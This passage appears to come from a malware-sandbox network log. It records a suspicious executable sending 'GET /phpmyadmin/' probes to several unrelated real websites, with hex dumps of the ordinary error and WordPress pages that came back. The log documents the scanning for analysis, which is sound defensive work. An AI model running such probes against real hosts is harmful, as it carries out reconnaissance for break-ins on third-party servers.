                                                                                                                                                                                                    2023-11-26 05:59:29 UTC192INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 94Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC94INData Raw: 46 6f 72 20 73 65 63 75 72 69 74 79 20 72 65 61 73 6f 6e 73 2c 20 74 68 69 73 20 55 52 4c 20 69 73 20 6f 6e 6c 79 20 61 63 63 65 73 73 69 62 6c 65 20 75 73 69 6e 67 20 6c 6f 63 61 6c 68 6f 73 74 20 28 31 32 37 2e 30 2e 30 2e 31 29 20 61 73 20 74 68 65 20 68 6f 73 74 6e 61 6d 65 2e
                                                                                                                                                                                                    Data Ascii: For security reasons, this URL is only accessible using localhost (127.0.0.1) as the hostname.


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    13192.168.2.45095318.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC206INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 61 67 72 69 63 6f 6c 61 2e 63 6f 6d 2e 62 72 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:29 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rechagricola.com.br/phpmyadmin/
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    14192.168.2.451631104.200.30.314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    15192.168.2.45105874.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC177OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC420INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://himontessori.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2c
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC7772INData Raw: 32 62 34 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 61 72 74 69 63 6c 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 61 72 74 69 63 6c 65 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20
                                                                                                                                                                                                    Data Ascii: 2b47<!doctype html><html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# article: http://ogp.me/ns/article#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile"
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC3313INData Raw: 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 61 62 6f 75 74 75 73 2f 22 3e 41 62 6f 75 74 20 48 4d 53 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 35 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 35
                                                                                                                                                                                                    Data Ascii: -post_type menu-item-object-page menu-item-has-children menu-item-3412"><a href="https://himontessori.com/aboutus/">About HMS</a><ul class="sub-menu"><li id="menu-item-3415" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3415
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC8192INData Raw: 33 62 31 30 0d 0a 09 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 3c 2f 6e 61 76 3e 3c 21 2d 2d 20 23 73 69 74 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2d 2d 3e 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 68 65 61 64 65 72 20 69 64 3d 22 6d 61 73 74 68 65 61 64 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 62 61 62 79 2d 68 65 61 64 2d 69 6d 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 68 65 61 64 65 72 2d 69 6d 67 22 3e 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 62 79 2d 63 6f 6e 74 61 69 6e 65 72 20 73 69 74 65 2d 62 72 61 6e 64 69 6e 67 20 22 3e 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 3b10</nav>... #site-navigation --></div></div></div><header id="masthead" class="site-header baby-head-img"> <div class="no-header-img"> <div class="baby-container site-branding ">
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC6934INData Raw: 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 34 2f 27 3e 20 41 70 72 69 6c 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 33 2f 27 3e 20 4d 61 72 63 68 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 32 2f 27 3e 20 46 65 62 72 75 61 72 79 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74
                                                                                                                                                                                                    Data Ascii: 021 </option><option value='https://himontessori.com/2021/04/'> April 2021 </option><option value='https://himontessori.com/2021/03/'> March 2021 </option><option value='https://himontessori.com/2021/02/'> February 2021 </option><option value='htt
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC4275INData Raw: 31 30 61 36 0d 0a 0a 09 09 3c 2f 73 65 6c 65 63 74 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 64 72 6f 70 64 6f 77 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 20 22 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 2d 2d 31 22 20 29 3b 0a 09 66 75 6e 63 74 69 6f 6e 20 6f 6e 53 65 6c 65 63 74 43 68 61 6e 67 65 28 29 20 7b 0a 09 09 69 66 20 28 20 64 72 6f 70 64 6f 77 6e 2e 6f 70 74 69 6f 6e 73 5b 20 64 72 6f 70 64 6f 77 6e 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 20 5d 2e 76 61 6c 75 65 20 21 3d 3d 20 27 27 20 29 20 7b 0a 09 09 09 64 6f 63 75 6d 65 6e
                                                                                                                                                                                                    Data Ascii: 10a6</select><script type='text/javascript'>/* <![CDATA[ */(function() {var dropdown = document.getElementById( "archives-dropdown--1" );function onSelectChange() {if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {documen


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    16192.168.2.450999191.6.210.84436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: esistem.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    17192.168.2.450951162.241.62.2204436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC379INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 6c 75 6d 61 72 75 6e 69 66 6f 72 6d 65 73 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://lumaruniformes.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC7813INData Raw: 33 39 31 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 4e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 6c 61 20 70 c3 a1 67 69 6e 61 20 26 23 38 32 31 31 3b 20 4c 75 6d 61 72 20 55 6e 69 66 6f 72 6d 65 73 3c
                                                                                                                                                                                                    Data Ascii: 3918<!doctype html><html lang="es-MX"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>No se encontr la pgina &#8211; Lumar Uniformes<
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC6809INData Raw: 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e
                                                                                                                                                                                                    Data Ascii: ;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .align
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC8192INData Raw: 34 30 30 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6c 61 79 6f 75 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 75 6d 61 72 75 6e 69 66 6f 72 6d 65 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2f 61 73 73 65 74 73 2f 63 73 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6c 61 79 6f 75 74 2e 63 73 73 3f 76 65 72 3d 38 2e 32 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 73 6d 61 6c 6c 73 63 72 65 65 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 75 6d 61
                                                                                                                                                                                                    Data Ascii: 4000<link rel='stylesheet' id='woocommerce-layout-css' href='https://lumaruniformes.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=8.2.1' media='all' /><link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://luma
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC8198INData Raw: 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 61 73 73 69 63 26 71 75 6f 74 3b 7d 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 77 72 61 70 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 70 6f 70 75 6c 61 74 65 64 22 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2d 39 33 31 31 30 35 61 20 65 6c 65 6d 65 6e 74 6f 72 2d 6e 61 76 2d 6d 65 6e 75 2d 2d 64 72 6f 70 64 6f 77 6e 2d 74 61 62 6c 65 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 6e 61 76 2d 6d 65 6e 75 5f 5f 74 65 78 74 2d 61 6c 69 67 6e 2d 61 73 69 64 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 6e 61 76 2d 6d 65 6e 75 2d 2d 74 6f 67
                                                                                                                                                                                                    Data Ascii: uot;:&quot;classic&quot;}"><div class="elementor-widget-wrap elementor-element-populated"><div class="elementor-element elementor-element-931105a elementor-nav-menu--dropdown-tablet elementor-nav-menu__text-align-aside elementor-nav-menu--tog
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
